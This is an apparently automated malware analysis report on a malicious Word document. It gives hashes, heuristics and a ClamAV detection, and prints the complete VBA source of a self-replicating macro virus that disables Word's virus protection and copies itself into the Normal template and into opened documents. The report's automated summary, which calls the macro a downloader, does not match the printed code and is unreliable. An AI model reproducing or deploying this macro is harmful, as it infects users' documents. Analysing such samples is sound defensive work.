Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b784b448f0ddc8a…

MALICIOUS

Office (OLE)

Size: 105.5 KB
Created: 2018-11-19 02:07:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: a4a9082db8703ff7301308a4915336e6
SHA-1: ea1c6d32f6dc0e3c5f19aa3193a2fe498a547790
SHA-256: 4b784b448f0ddc8a1722d72ea6311b143287503bb19803c35f76789011045eab
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

This document contains VBA macros, specifically a Document_Open macro designed to execute code upon opening. The macro attempts to replace its own code with content from the first 20 lines of the `ThisDocument` module, suggesting it's a downloader or dropper. The presence of a 'Password-protected archive handoff' heuristic indicates the macro may be intended to decrypt or retrieve a payload from an encrypted archive. The ClamAV detection further confirms its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    'KILL
    Private Sub Document_Open()
       On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1086 bytes
SHA-256: a8e47de383d7047002ffbc39050de92bda3cb4985642e0f4f5ddf8ca290054e7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "AztSiw1, 0, 0, AZTSIWLib, AztSiw"
'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False
   Options.VirusProtection = False
   Options.SaveNormalPrompt = False
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub